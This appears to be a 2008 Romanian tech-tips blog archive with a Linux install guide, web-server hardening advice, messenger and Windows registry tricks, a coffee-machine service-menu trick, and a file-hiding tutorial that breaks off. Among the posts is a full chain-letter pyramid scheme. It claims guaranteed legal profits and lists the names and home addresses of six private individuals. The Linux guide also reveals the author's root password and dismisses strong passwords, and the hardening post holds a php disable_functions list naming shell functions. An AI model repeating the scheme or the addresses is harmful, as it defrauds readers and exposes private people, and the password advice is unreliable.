ClubHack - tutoriale, trucuri si informatii utile : octombrie 2008

Instalarea sistemului

Ati hotarat sa instalati Linux-ul pe calculator? Foarte bine. Pentru aceasta veti avea nevoie de:

1. calculator (presupun ca-l aveti, altfel cum ati fi citit aceasta pagina?!)
2. CD bootabil cu o distributie Linux
3. o programa buna de partitionare a hard-discului - asa ca Partition Magic
4. o discheta goala
5. timp
6. ceva de mancat si baut (nu radeti, ca e destul de important!)

Instalarea in sine, va cuprinde mai multe etape:

Partitionarea

Daca aveti deja Windows instalat pe calculator si nu doriti sa renuntati complet la el, va trebui sa creati o noua partitie a hard-discului. Nu va temeti, e simplu si nu e nevoie de studii superioare pentru a face aceasta. Necesitatea acestei noi partii ar fi faptul ca Linux si Windows difera foarte mult in ceia ce priveste faptul in care acceseaza hard-discul si modul de gestionare a fisierelor. In majoritatea lor, distributiile Linux vin pe CD impreuna cu un program care face partitia, insa eu v-as recomanda sa folositi programul "Partition Magic" - este cel mai comod in utilizare avand o interfata intuitiva si foarte simplu de folosit. Cu ajutorul acestui program veti crea 2 partitii noi: "LinuxExt" si "LinuxSwap".

LinuxExt - Linux extended. Aici se va situa intreg sistemul de operare. Daca doriti sa instalati intrega versiune a SO, veti avea nevoie de aproxmiativ 1.5 gb plus spatiu pe hard-disc pentru fisiere temporare, si alte programe. Insa aveti in vedere ca o instalare "full" inseamna instalarea unui Web server, FTP server, News server etc. Nu cred ca veti avea nevoie de asa ceva pe calculatorul de acasa. De exemplu, pe calculatorul meu Linux ocupa in jur de 280 Mb. La instalare vi se va propune sa selectati ce componente doriti sa fie instalate, insa despre aceasta se va vorbi mai jos. Exista chiar versiuni compacte ale sistemului care se booteaza de pe 3 dischete - dintre care 2 contin softul si nu sistemul de operare insusi! Il puteti gasi aici.

Linux Swap - traditional, marimea acestei partitii trebuie sa fie de 2 ori mai mare decat RAM-ul pe care-l aveti, insa in caz daca aveti peste 128 RAM, dispare necesitatea unei partitii de Swap.

Instalarea

Pentru instalare veti avea nevoie de cat mai multa informatie despre hard-ul dvs. Pentru aceasta in Windows, in My Computer gasiti cat mai multe despre cartela dvs de sunet, cartela video, modem etc. (daca aveti modem intern - posibil e sa nu-l puteti folosi sub Linux )
Sa speram ca ati reusit sa partitionati cu succes hard-discul Dvs fara a formata complet partitia Windows-ului (desi nu ar fi o mare tragedie :-). Cred ca sunteti gata de marele eveniment. Rugati-i pe toti care ar putea sa va incurce sa mearga in varful degetelor.

Dsicul de pa care urmeaza sa instalati Linux-ul ar trebui sa fie bootabil. Pentru ca calculatorul Dvs. sa poata initia de pe el programa de instalare trebuie sa va jucati putin cu setarile din BIOS care ar face ca citirea primara sa se faca de pe CD-ROM. Cred ca a-ti mai facut-o atunci cand ati avut "norocul" sa instalati Windows-ul. Rstartati calculatorul si introduceti CD-ul bootabil in calculator, asteptati pana se initiaza programul de instalare a Linux-ului. Acum sau niciodata.
La initiere, programul de instalare va efectua o serie de teste de determinare a configuararii hard-ului calculatorului. Dupa aai, posibil va urma logo-ul distributiei Dvs. mai departe vor urma intrebari extrem de simple: asa ca limba Dvs, tipul tastaturii, mouse etc. (este chiar si romana :-)). Aici nu cred ca ar avea cineva probleme.

Setarea punctului de montare

Mici probleme ar putea aparea la alegerea partitiei pe care doriti sa instalati Linux-ul. Ceva intr-o fereastra cu denumirea "Disk Setup". Aici se vor afisa partitiile care sunt pe calculator. Ar trebuie sa vedeti ceva de genul:
Mount point Device Requested Actual Type
dev1 XX Mb YY Mb Win95
dev2 XX Mb YY Mb Linux Swap
dev3 XX Mb YY Mb Linux native

Nu disperati daca la ecran aveti afisat ceva care putin difera de tabela de mai sus, principalul e sa prindeti ideia.

hda1 reprezinta partitia pe care se aflai instalat Windows-ul vostru mult-iubit :-). Dar cred ca e clar, nu? Cred ca aveti cu totii 9 clase terminate.

Aici va trebui sa alegeti partitia (Device) pe care se va instala Linux-ul. Pentru aceasta selecati partitia pe care sta "Linux Native" (in exemplu nostru - hda3) si apasati 'Space'. In fereasta ce va aparea, insemnati punctul de montare cu simbolul '/', apasati OK. Prin aceasta aceasta, ati indicat ca directorul radacina (root directory) sa fie montat pe partitia de Linux Native.

FITI ATENTI SA NU ALEGETI ALTA PARTITIE AFARA DE 'LINUX NATIVE', ASA CUM AU FACUT-O DESTUL DE MULTI!!!

In continuare va urma un dialog care ar dori sa stie ce partitie sa formateze. Selectati acea partitie pe care se afla Linux Native. Selectati partitia '/dev/hda3' in exemplul de mai sus. Fiti din nou foarte atenti sa nu formatati o alta partitie!

Selectarea pachetelor

Dupa selectarea partitiei si formatarii ei, va trebuie sa precizati despre ce instalare e vorba: Statie de lucru GNOME, KDE, instalarea unui server sau o actualizare a unui kernel mai vechi (upgrade). Dupa aceia va trebui sa selectati pachetele individuale. Daca ati renuntat la ceva care este indispensabil sistemei veti fi atentionat astfel incat sistema dvs sa poata lucra fara probleme si greseli (nu asa ca... stiti voi cine!). Apasati OK si va incepe instalare.

Configurara serviciilor

Dupa copierea pachetelor pe hard-disc, veti fi invitat sa configurati X-Windows (interfata grafica pentru Linux numita X). Alegeti tipul de monitor si tipul cartelei grafice ce o avet, daca monitorul dvs nu este in lista, alegeti ceva de genul "generic" si alegeti o rezolutie mai mica la inceput, dup'aia o puteti mari fara probleme.
Urmeaza configurarea mouse-lui (simtiti frica? :-)). Aletgeti, pur si simplu "Generic PS/2 Mouse". Dupa aia, alegerea orei si luni (intrebati pe cineva mai mare ca sa fiti mai siguri :-).
Veti mai fi intrebat daca doriti ca interfata grafica, X-Windows, sa fie interfata implicita. Daca sunteti un incepator cu 'I' mare selectati aceasta optiune, daca nu, puteti porni interfata grafica oricand cu comanda 'startx'. Ultima ce vai mai ramas e sa configurati o imprimanta.

Utilizatorii

Linux este un sistem multi-utilizator. Desi e cel mai probabil ca veti folosi calculatorul de unul singur, pentru comoditatea dvs ar fi bine sa creati mai multe conturi de utilizatori. In primul rand, un cont de 'administrator' (root, super-user) - cel care are cele mai mari drepturi in sistem. Veti folositi acest cont pentru a intretine si a administra sistemul. Insa faptul de a avea drepturi absolute in sistem ar putea facilita distrugerea lui de catre incepatori, de aia e indicat sa creati un cont de utilizator cu drepturi limitate care v-ar impiedica de la actiuni stupide. Insa puteti in orice clipa sa reveniti la statutul de 'super - urilizator' cu comanda 'su'. Alegeti o parola de 'root'. De exemplu, parola mea de root este 'bugmafia' - adica ceva foarte simplu deoarece am incredere in cei din familia mea :-))))). Nu cred ca e nevoie de accese excesive de paranoia, nu cred sa fie foarte multi care si-ar vinde sufletul ca sa patrunda in sistemul dvs. Lucruri mult mai urate pot fi facute sistemului dvs de catre atacatori fara ca ei sa aiba cea mai mica ideie de parola dvs de administrator. Asa ca, conteaza administrarea, nu parola ei. Dupa configurarea contului de root, veti fi invitat sa creati un cont mai putin privelegiat - acest cont va fi folosit in mod normal - mai ales cand stati pe Net.

Bootarea

Ultima faza, este selectarea modului in care doriti ca sa starteze Linux-ul. Cel mai comod ar fi sa configurati LILO (adica LInux LOad). In acest caz, pe sectorul zero al hard discului (de pe care se incarca sitemul operationl) se inscrie programa care propune la start-up optiunea de a incarca Windows-ul sau Linux-ul. La prima vedere aceasta ar fi cea mai comoda metoda. Asa si este, insa in cazul reinstalarii Windows-ului (o data in 2 saptamani in cazul meu) el va scri informatia despre incarcarea sa pe sectorul zero peste LILO, stergandu-l. Cu alte cuvinte, daca reinstalati Windows-ul nu veti mai avea acces la Linux . Esirea din situatie ar fi utilizarea unei dischete de boot de pe care s-ar porni Linux-ul. Cand veti dori sa folositi Linux-ul, pur si simplu la start-up veti introduce discheta si Linux-ul se va porni de pe ea (desigur va trebui sa va jucati putin la setarile din BIOS), cand veti dori sa folositi Windows (mai cade lumea in pacat ) pur si simplu porniti calculatorul ca inainte - insa fara discheta Linux!

Restart & Enjoy

Restartati calculatorul, in BIOS schimbati setarile ca stfel ca incarcarea sistemului sa se faca de pe discheta. Nu uitati sa introduceti discheta. Veti vedea un prompt de tipul:

LILO
Press 'Enter' (or wait 10 seconds) to boot your Red Hat System from /dev/hda3.
You may override your default kernel parameters by typing "Linux " if you like.

boot:

Apasati 'Enter' (sau asteptati 10 secunde, daca sunteti un om foarte rabadator J si... va porni Linux-ul! Yeehaw!!! Dar nu strigati prea tare...

La servici la scoala , avem masini de cafea nu e ashea baieti ...pei ...e simplu ...in general ele sunt aduse de nemti ...mama lor de nemti ce leam facut cu VNC-ul in calculatoare deobicei sunt mai inapoiati mintali ca toti straini , si haideti sa incepem sa invatam cum sa pacalim aparatul ala de cafea...

Bun pentru inceput trebuie sa tragi catre tine un pic de coltu masini , vezi in poza care am uploadato sageata din colt rosie , dupa care apasa 4 ...si ai intrat in meniu da drumu la colt , 1 este sus , 2 este jos ...in rest va descurcati ... nu ?

Daca ai un CD zgariat care nu mai merge dar ai date importante pe el, il poti repara foarte simplu si foarte ieftin

Ai nevoie de:
Un CD zgariat
Doua carpe moi
Pasta de dinti

Metoda:
Pe carpa moale pui pasta de dinti cam cat un bob de mazare si freci CD-ul cu o miscare circulara pe toata suprafata CD-ului
Pasta de dinti va umple golurile facute de zgarieturi si astfel CD-Romul va putea citi din nou CD-ul
Dupa ce ati terminat de frecat CD-ul, luati o alta carpa moala si uscata, si prin aceeasi miscare circulara curatatil de restul de pasta de dinti
Acum CD-ul e functionabil din nou

Povesteam cu cineva despre securizarea unui server de web si am pregatit o lista de sugestii.
Daca ar fi serverul meu, as face urmatoarele lucruri:

1. m-as uita saptamanal daca nu au aparut versiuni noi la aplicatiile pe care le-am instalat (cpanel, phpbb, wordpress...)
cel mai bine este sa te inscrii la mailinglist-urile proiectelor respective si sa fii anuntat instant cand a aparut un security fix.

2. as pune o parola puternica la toate serviciile de administrare (cpanel, mysqladmin, ...)
http://strongpasswordgenerator.com/

3. mai bune, as restrictiona accesul la aceste servicii doar pentru anumite adrese de IP (din firewall, e simplu).
sa am access numai de pe IP-urile folosite de mine.

4. as muta ssh pe un alt port. daca ramane pe portul 22 toate lumea il ataca si la un moment dat poate au noroc.

5. as inchide toate porturile care nu sunt necesare.
Pentru un server de web sunt necesare doar 80, 443 (eventual 53 - DNS si 25 - SMTP - mail)

Eventual, daca am porturi pe care vreau sa le folosesc din cand in cand de pe alte ip-uri:
folosesc port knocking http://www.portknocking.org/ pentru porturile alea.

idea de baza aici este ca se definesc niste secvente de event-uri in urma carora se deschid/inchid porturi.
eventurile pot sa fie knock-uri in firewall (de ex. trimiti un pachet pe portul 3 pe urma pe 5 pe urma, ...)
cand seventa corespunde, deschid portul. cand nu mai am nevoie de el, il inchid.

6. configureaza apache sa nu arate continutul directoarelor
http://www.ducea.com/2006/06/26/apac...ctory-indexes/
incredibil de multe probleme apar din chestia asta.

7. as instala mod_security si l-as configura sa logheze post-urile.
asta poate sa ocupe mult loc dar merita. daca ai probleme vezi tot ce a facut atacatorul.
http://www.modsecurity.org/ - mod_security este un foarte bun application firewall si chiar daca ai aplicatii vulnerabile face sa fie foarte greu de exploatat vulnerabilitatiile. (chiar imposibil in unele cazuri)

8. as instala php cu patch-ul Suhosin
http://www.hardened-php.net/

9. as configura php.ini-ul (chestiile de baza)
http://www.conftool.net/en/technical...ity_hints.html
http://www.php.net/magic_quotes

magic_quotes_gpc = On
register_globals = Off
disable_functions = show_source, system, shell_exec, passthru, phpinfo, proc_open, proc_nice
allow_url_fopen = Off
allow_url_include = Off
display_errors = Off
open_basedir = "/var/www"

10. as folosi un Host-based intrusion detection system (gen tripwire, samhain, aide)
http://en.wikipedia.org/wiki/Host-ba...tection_system
http://sourceforge.net/projects/tripwire/
http://sourceforge.net/projects/aide

astea sunt simplu de folosit. la configurezi sa indexeze un director si pe urma regulat sa verifice daca sunt schimbari in structura
(a aparut un fisier nou, s-a modificat continutul la alt fisier). poti sa prinzi instant deface-uri, cand cineva uploadeaza un shell, ...
se pot configura sa-ti trimita email cand apar modificari. foarte folositoare.

11. as activa selinux
poate sa te salveze intr-o multime de cazuri de 0day-uri
https://wiki.ubuntu.com/SELinux

12. si in final si as folosi AppArmor
https://wiki.ubuntu.com/AppArmor
sau systrace (pentru OpenBSD)
http://www.citi.umich.edu/u/provos/systrace/

AppArmor e o chestie super geniala. Idea originala a pornit din OpenBSD de la systrace.
Se defineste un fisier/profil pentru fiecare aplicatie, unde se specifica exact ce poate sa faca aplicatia respectiva (scrie in fisierul asta, deschide portul asta, ...)
Pentru aplicatiile de baza (apache, ssh) sunt deja definite profile care pot fi refolosite.
Daca apare un 0day, exploit-ul nu poate sa faca nimic pentru ca este restrictionat.

Cam atat pentru moment.

Niste chestii dragute pe care le poti face la Y!M
Probabil ca unii dintre voi le stiati deja dar unii probabil ca nu stiau

1)Schimba Titlul de la Messenger
Te duci in folderul de care ai instalat Y!M
La mine spre exemplu se afla aici
C:\Program Files\Yahoo!\Messenger
Acolo cauti fisierul ymsgr.ini
Deschidel si la sfarsitul textului pe care il vei gasi acolo adauga asta:
[app title
Caption=AICI SCRII TU CE VREI

2)Dai BUZZ in mass
In messenger intri la Preferences iar acolo alegi Appearance
Dai click pe butonul pe care scrie "Change Fonts & Colors"
Apor apesi pe butonul "Use Default" > "OK"
Apoi selectezi toata lista si dai "Send an instant message"
In el scrii :

3)Multi Mess din Registry
Start->Run->regedit->HKEY_CURRENT_USER->Software ->Yahoo ->Pager ->Test ->acum dai click dreapta >New DWORD value -> acolo scrii : plural
Dai click dreapta pe el > modify > acolo scrii un numar (ex.10)
Acum vei putea deschide inca 10 Y!M

4)YMISTIC
Acesta este un (RO)bot care are mai multe intrebuintari
Pentru a-l putea accesa dai add in lista de messenger la ymistic
DICTIONAR

Roman > Englez
!dic/roen CUVANT CHEIE
Englez > Roman
!dic/enro KEY WORD

METEO
!weather bucuresti

INTERNET
!lookup google.com

BIBLIE
!bible/bor Mt 3,1-3

5)Hidden Smiley Plug-in
Instalezi acest Plug-in ymsgr:getplugin?&type=1&id=35c688d8-...&version=1.2.0
Ca sa il folosesti intri pe persoana cu care vrei sa vorbesti
In coltul din stanga sus e un buton verde pe care scrie Plug-ins
Dai click pe el iar in dreapta dai la My Plug-ins
Apesi pe Start la Plug-inul de Smiley si acum ai toate fetele inclusiv cele ascunse

6)...

Suntem diferiti. Ne plac lucruri diferite, vrem sa fim unici, incercam sa evitam rutina sau pur si simplu gusturile noastre nu se potrivesc. Aceeasi situatie apare si in relatia dintre utilizator si sistemul de operare. Windows vine intr-o forma neslefuita, dura, si nu toata lumea este dispusa sa il accepte asa. Vom vedea in continuare cateva schimbari utile care il pot face mai 'ascultator'.

1. Pornirea Windows Explorer in folderul ales de tine

In mod normal, Windows Explorer este setat sa mearga direct in directorul My Documents la fiecare lansare. Pentru a schimba aceasta situatie, mergeti pe icon-ul sau si cu butonul din dreapta accesati Properties. Schimbati target field-ul cu "%SystemRoot%explorer.exe /e, c:". Il puteti face sa mearga direct in Jocuri sau oricare alt director. Spre exemplu, daca doriti ca la fiecare accesare sa fiti trimis pe My Computer, atunci nu trebuie decat sa introduceti urmatorul target field: "%SystemRoot%Explorer.exe /e,".

2. Invata-ti Windowsul sa se logheze automat pe contul tau

Multi poate ati observat ca, la fiecare pornire a Windows-ului, acesta nu mai intra direct in contul vostru de utilizator. Acest lucru se intampla datorita ultimelor update-uri de la Microsoft, mai precis cel pentru .Net Framework, care creaza automat un nou cont de utilizator numit ASP.NET. Din cauza lui, logarea automata este blocata.

Bineinteles ca multi va veti gandi ca cele mai simple metode ar fi de a renunta la update-ul respectiv sau de a sterge contul ASP.NET. Iata o metoda si mai simpla pentru a rezolva problema: Accesati Start->Run si scrieti "control userpasswords2". Va aparea o fereastra cu lista utilizatorilor, unde trebuie sa selectati contul dorit si sa debifati optiunea “Users must enter a user name and

password to use this computer”. Din pacate, aceasta solutie este valabila doar pentru posesorii de Windows XP Professional.

3. Va grabiti si calculatorul nu vrea sa se inchida mai repede?

Pentru a optimiza secventa de Shut Down mergeti la Start->Run si tastati "regedit". Cautati cheia urmatoare: [HKLMSYSTEMCurrentControlSetControlSessionManagerMe mory Management]. Dupa ce ati gasit-o, setati valoarea ClearPageFileAtShutdown la 0.

De asemenea, daca sunteti utilizatori de Windows XP Professional, puteti sa obtineti acelasi efect accesand Group Policy Editor prin comanda Start->Run->"Secpol.msc".

4. Dupa ce ati folosit ceva timp Windows-ul ruland o multime de programe deodata, probabil ca v-ati dat seama cat de folositor este icon-ul "Show Desktop". Din pacate, cu ceva timp in urma l-ati scos din quick launch. Cum faceti sa il readuceti la locul lui?

Folositi urmatoarea metoda:
Mergeti la Start->Run si tastati comanda "regsvr32 /n /i:U shell32". Iconita va reaparea instant in Quick Launch.

5. Eliminati afisarea numelui de utilizator si a imaginii aferente din meniul de start

Multi se plang de aceasta situatie, considerand ca este deranjanta afisarea acestor informatii in meniul de start. Solutia de a scapa de aceasta afisare (fara a dezactiva Welcome Screen-ul si Windows XP Themes) este urmatoarea:
Navigati in „Cocuments and SettingsAll UsersApplication DataMicrosoftUser Account Pictures”, in interiorul caruia veti gasi un fisier BMP cu numele dumneavoastra de utilizator, de genul „smith.bmp”. Redenumiti acel fisier in „smith2.bmp”. Urmatorul pas este sa redenumiti directorul „Cocuments and SettingsAll UsersApplication DataMicrosoftUser Account PicturesDefault Pictures” in „Old_Default Pictures”. Pentru a elimina numele de utilizator folositi Registry Editor (Start->Run->regedit) cautand cheia [HKEY_CURRENT_USERSoftwareMicrosoft WindowsCurrentVersionPoliciesExplorer]. In lista din dreapta setati valoarea NoUserNameInStartMenu la 1. Dupa restart, numele de utilizator si poza nu vor mai fi afisate.

6. Windows-ul uita setarile voastre din Folder Options?

Este adevarat. Unii sunt mai meticulosi si isi customizeaza folderele dupa gustul lor estetic, doar ca Windows-ul nu poate memora mai mult de 400 de foldere setate. Totusi, il putem invata sa retina mai mult astfel: folosind Registry editor, mergeti la cheile mentionate mai jos si modificati BagMRU Size la 5000 (sau pana la 8000). Nu depasiti valoarea 8000, recomanda programatorii.

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShell][HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRo am]
7. Setati command prompt-ul sa porneasca in locatia dorita.

Este stiut faptul ca la comanda “cmd” din Run se lanseaza command prompt-ul direct in folderul „home” al utilizatorului („Cocuments and Settings”). Pentru a modifica aceasta presetare, folosind regedit, mergeti la cheia [HKEY_CURRENT_USER SoftwareMicrosoft Command Processor] si cautati valoarea „Autorun”. In cazul in care aceasta lipseste, creati un nou REG_SZ si introduceti acolo folderul dorit, precedat de CD (ca la comenzile din MS-DOS). Daca lasati CD simplu, atunci el va porni direct in „C:”. Puteti de asemenea sa tastati „CMD /?” pentru a vedea informatii detaliate despre parametrii comenzii.

8. Uneori nu puteti folosi modul ‘preview” pentru fisiere GIF, JPEG sau HTML in casuta Display Properties.

Tastati „REGSVR32 /i SHIMGVW.DLL” si „REGSVR32 /i MSHTML.DLL” in Start->Run pentru a rezolva acest neajuns.

9. Stergeti informatiile referitoare la cautarile anterioare pentru a va proteja intimitatea.

Utilizati Registry Editor si cautati [HKEY_CURRENT_USERSoftwareMicrosoftInternet Explorer ExplorerBars FilesNamedMRU]. Acolo veti putea sterge cautarile anterioare.

10. V-a expirat programul de arhivare zip si vreti sa reveniti la functia oferita de Windows XP pentru management-ul arhivelor zip. Din pacate, extensia zip a ramas neasociata dupa dezinstalarea programului folosit anterior.

Pentru a reasocia fisierele .zip cu dezarhivatorul integrat de Windows mergeti la Start->Run si tastati „REGSVR32 ZIPFLDR.DLL” sau „cmd /c assoc .zip=CompressedFolder”.

Trebuie retinut faptul ca, datorita numarului mare de setari si schimbari ce survin in cazul sistemului de operare Windows, nu putem garanta ca metodele mentionate mai sus vor functiona in totalitate asa cum au fost descrise

FACI BANI DOAR IN 3 SAPTAMANI!!!!!!!

Descriere:
CEA MAI SIMPLA SI PROFITABILA METODA LEGALA DE FACUT BANI PENTRU ROMANI!
BANI RAPID SI SIGUR PE INTERNET. TOTI CEI CARE AU INCERCAT PANA ACUM
SUNT FOARTE MULTUMITI. FUNCTIONEAZA CU ADEVARAT.

Depinde numai de tine daca vrei sa citesti pagina asta sau nu , eu nu
pot spune decat ca 10 min. de citit iti pot schimba viata , si
portofelul. Depinde numai de tine
POTI FACE BANI USOR SI REPEDE! Crede-ma: am incercat toate metodele
posibile (legale). Aceasta este cea mai USOARA si mai RAPIDA cale.
Poti sa faci o gramada de bani , repede si legal. Merge! E testat! Tot
ce trebuie sa faci deocamdata este sa citesti cu atentie si pana la
final textul.

In urma cu ceva vreme navigam aiurea pe Internet (probabil la fel cum
faci si tu acum) cand am descoperit un articol asemanator cu acesta in
care se spunea ca pot sa castig milioane in doar cateva saptamani cu o
investitie de numai 60.000 de lei. Eram usor sceptic la inceput ,
totusi... am continuat sa citesc.
Articolul spunea ca trebuie sa trimiti cate 1 RON (10.000 de lei
vechi) la fiecare din cele 6 adrese mentionate in articol . Apoi sa
iti treci numele si adresa la sfarsitul listei in pozitia a 6-a si sa
publici articolul la minim 200 de forum-uri -adrese cu anunturi pe
Internet sau prin mail la cat mai multe adrese. Pur si simplu!

Dupa ce am analizat chestiunea si dupa ce am discutat cu cativa
prieteni m-am hotarat sa incerc. La urma urmei ce aveam de pierdut in
afara de 60.000 de lei si 6 timbre?
Cum este si normal , la inceput eram sceptic si chiar ingrijorat in
privinta aspectului legal. Asa ca m-am interesat la PTTR si mi-au
confirmat ca intr-adevar e legal.
Deci am facut infima investitie de 60.000 de lei si am facut ce era
necesar. Surpriza! Ghiciti ce s-a petrecut! Intr-un interval de 7 zile
am inceput sa primesc bani in cutia postala.
Eram uluit! M-am gandit ca probabil se va opri curand , dar banii au
continuat sa vina! In prima saptamana am primit 370.000 de lei. La
sfarsitul celei de-a doua aveam
1.090.000. In a treia saptamana stransesem 25.470.000 de lei! Si banii
continua sa vina cu repeziciune. In mod cert a meritat sa cheltui cei
60.000 de lei si cele 6 timbre (Am cheltuit mult mai mult jucand la
loto si la bingo!). Sa va spun cum functioneaza si mai ales de ce
functioneaza. In primul rand va sfatuiesc sa salvati pe hard sau sa
printati articolul ca sa il aveti la indemana. Cum?

PASUL 1: Iei 6 coli de hartie si scrii pe fiecare din ele : \\\\\\\"M-AM
ADAUGAT LA LISTA TA\\\\\\\" , astfel incat cel ce primeste plicul sa te adauge
la listele pe care urmeaza sa le posteze si asa adresa ta va aparea pe
alte sute si sute multiplicate de forumuri , apoi impaturesti fiecare
coala (cat sa intre in plic). Acum iei 6 bancnote de 1 leu nou (10.000
de lei vechi) si pui CATE UNA in FIECARE din cele 6 coli (ca sa nu se
vada prin plic si sa nu se fure) , apoi pui FIECARE coala in CATE UN
PLIC si inchizi plicurile.
Ar trebui sa ai acum 6 plicuri sigilate , cu numele si adresa ta pe ele
(la expeditor , pentru a ajunge in continuare pe forumuri!) , fiecare
dintre ele continand o coala de hartie si o bancnota de 1 leu nou
(10.000 de lei vechi). Acum trimiti plicurile la urmatoarele adrese:

1) Radu Ion , str. Lam?itei , nr.58 , sector4 , Bucuresti , cod 040552

2) Patras Ovidiu , str.Florilor , nr.1 , bl.22 , sc.b , et.4 , ap.16 , Loc.Husi , Jud.Vaslui , cod 735100

3) Lechintan Valeriu , str. P-ta Karl Liebknecht , nr.7-8 , Sc. B , Ap. 3 , Cluj-Napoca , cod 400263

4) Baragau Alexandra , str. Cetatuia , nr. 1 , bl. M21 , sc. 4 , et. 9 , ap. 253 , sector 6 , Bucuresti

5) Catanoiu Alexandra, str. Aleea Lalelelor, nr. 1 , bl. FB7, sc. B, et. 3, ap. 15, Slatina, jud. Olt, cod 230032

6) Petrina Emanuel , str. Prelungirea Bradului , bloc 123 sc. C ap 1 Bacau Bacau cod 600367

PASUL 2: Acum stergi din lista pe numarul 1 si muti celelalte adrese
cu o pozitie mai sus (6 devine 5 , 5 devine 4 , 4 devine 3 , etc...).
Astfel numarul 6 devine liber: completezi cu numele si adresa TA
completa aceasta pozitie.

Trebuie foarte clar sa intelegi ca DACA TE VEI PUNE IN ALTA POZITIE
DECIT CEA DE-A 6-a , vei primi cu mult mai putini bani , pentru ca
factorul de multiplicare se

diminueaza. Ca sa intri in joc , va trebui sa trimiti cit mai rapid
plicurile , apoi sa dai anunturile. Pentru a intari increderea in joc ,
trebuie SA NU TRISEZI si SA TRIMITI PLICURILE ,
deoarece altminteri te excluzi singur din circuit semanind neincrederea.

PASUL 3: Schimba ce doresti dar , pe cat se poate , incearca sa mentii
articolul cat mai aproape de original. Acum publica anuntul la cit mai
multe forum-uri-newsgroup-uri (sunt o groaza
pe internet; ti-am adaugat si eu mai jos destule adrese; in plus , eu
trimit si la adresele de e-mail cunoscute , sa-mi ajut rudele si
prietenii sa cistige si ei bani).

200 este atat cat iti trebuie , dar cu cat publici in mai multe locuri
cu atat mai multi bani vei castiga! Nu e nevoie sa scrii din nou tot
acest articol; poti sa selectezi textul
cu cursorul mouse-ului si sa il copiezi in memoria
calculatorului(\\\\\\\\\\\\\\\'Copy\\\\\\\\\\\\\\\ ' din meniul \\\\\\\\\\\\\\\'Edit\\\\\\\\\\\\\\\'); deschizi un fisier gol
cu \\\\\\\\\\\\\\\'notepad\\\\\\\\\\\\\\\'(\\\\\\\\\\ \\\\\'File\\\\\\\\\\\\\\\'...\\\\\\\\\\\\\\\'New\\ \\\\\\\\\\\\\') si inserezi textul ca sa iti adaugi
numele in
pozitia a 6-a (\\\\\\\\\\\\\\\'Edit\\\\\\\\\\\\\\\'...Paste\\\\\ \\\\\\\\\\'); salvezi fisierul cu extensia
.txt. Acum intra pe Internet la adresele pe care ti le ofer si daca
vrei mai multe newsgroup-uri (forum-uri on-line , message board-uri ,
site-uri de chat , de discutii) romanesti bineinteles , intra pe motoare
de cautare! Iti sugerez sa treci ca subiect un titlu cat mai atractiv ,
pentru ca acesta il vor vedea cei ce viziteaza aceste site-uri.
GATA! Spor la treaba! Nu ar trebui sa iti ia mai mult de 30 de secunde
pentru fiecare newsgroup!

TINE MINTE : MAI MULTE NEWSGROUP-URI INSEAMNA MAI MULTI BANI! TOT CE
TREBUIE ESTE UN MINIM DE 200! Vei incepe sa primesti bani in cutia
postala in cateva zile dupa ce ai expediat plicurile si ai dat
anuntul! Eventual poti sa iti inchiriezi o casuta postala la PTTR din
cauza numarului mare de scrisori pe care le vei primi.
Acum hai sa facem un calcul simplu. Din cele MINIM 200 de publicari pe
care le-am facut , sa spunem ca primesc 5 raspunsuri (un exemplu
FOARTE-FOARTE mic!).
Deci am castigat 50.000 de lei cu numele meu pe pozitia a 6- a. Acum
fiecare din cele 5 persoane care tocmai mi-au trimis cate o scrisoare ,
publica la randul lor MINIMUL de
200 de articole cu numele meu pe pozitia a 5-a si primesc si ei cate
50.000 de lei. Eu primesc astfel 5x5x10.000 de lei = 250.000 de lei.
Continuand exemplul cu acest numar mic (5) de
persoane care raspund la articol , castig 1.250.000 de lei cu numele
meu pe pozitia a 4-a , 6.250.000 cu numele meu pe pozitia a 3-a ,
31.250.000 de lei pe pozitia a 2-a si ...
DA: 156.250.000 DE LEI cu numele meu pe pozitia intai. Pare UIMITOR!
Dar e necesar ca fiecare participant sa publice acest articol de MINIM
200 de ori!
Si totul cu o investitie initiala de 60.000 de lei si 6 timbre. Cand
numele tau nu se mai afla in lista poti sa repeti procedura: iei
ultima varianta a articolului si trimiti cate 10.000 de lei la
adresele care se afla in lista , punandu-ti numele pe pozitia a 6-a.
Acum publici articolul din nou de MINIM 200 de ori.

Iti dai seama ca in fiecare zi mii de oameni intra pe Internet si
citesc aceste articole ASA CUM CITESTI TU ACUM! Asa ca iti poti
permite 60.000 de lei sa vezi daca merge
cu adevarat , nu? Cred ca da... Unii au intrebat , pesimisti \\\\\\\"dar daca
lumea se satura si nu mai trimite nimeni nici un ban?\\\\\\\" Ma intreb si
eu , realist: Ce sanse sunt sa se intample asta cand
ZILNIC se alatura 20- 50.000 de useri noi la Internet , dintre care
foarte multi citesc astfel de anunturi si sunt dispusi sa incerce ,
dornici fiind de un cistig suplimentar?

JOACA CINSTIT SI CORECT SI ADRESA TA VA AJUNGE PE MII DE FORUMURI ,
ASTFEL VEI PRIMI MII DE PLICURI.! IN FIECARE ZI INTRA SUTE SAU
MII DE OAMENI PE FORUM! VEI AVEA NUMAI DE CASTIGAT! JOCUL SE BAZEAZA
PE O BINECUNOSCUTA LEGE DIN ECONOMIE SI ANUME

LEGEA MULTIPLICARII , PE CARE CRED CA POTI SA O INTELEGI. DECI , DACA
JOCI CORECT SI TRIMITI PLICURILE , ADRESA TA VA APAREA PE MULTE
SITE-RI SI VEI PRIMI CU MULT MAI MULTI BANI DECIT CREZI ACUM! Eu
personal am intrat si participat cu seriozitate de 2 ori pina acum in
acest joc-afacere si
de fiecare data am cistigat nesperat de multi bani , asa ca acum o iau
de la capat si joc a treia oara. BAFTA si tie!

P.S. IMPORTANT: O SA INTALNESTI OAMENI CARE NU SUNT DE ACORD CU ASTA
SI CARE NU AU CURAJ SA INCERCE SA SE IMBOGATEASCA INTELIGENT.
ACESTIA SE MULTUMESC DOAR SA INJURE (MAI MULT NU POT FACE , deh).
TREBUIE DOAR SA-I IGNORI. ASA CUM FAC EU ACUM , JOACA SI TU SI O SA
VEZI
CUM PLICURILE INCEP SA SOSEASCA la doar citeva zile dupa expedierea
plicurilor si publicarea pe internet si e-mailurile cunoscutilor a
acestui articol. DACA AI INCREDERE SI
PERSEVEREZI , O SA-MI MULTUMESTI CAT PENTRU CEI CARE NU JOACA.
Pesimistii isi racesc degeaba gura , EU PRIMESC ZECI DE PLICURI CU BANI
SI O SA
CONTINUI SA JOC!

Deci sa incepem....

Aduna fisierele pe care vrei sa le ascunzi + .jpg-ul (imaginea) , punele in un folder.
Eu voi fi voi folosi C:\New Folder.
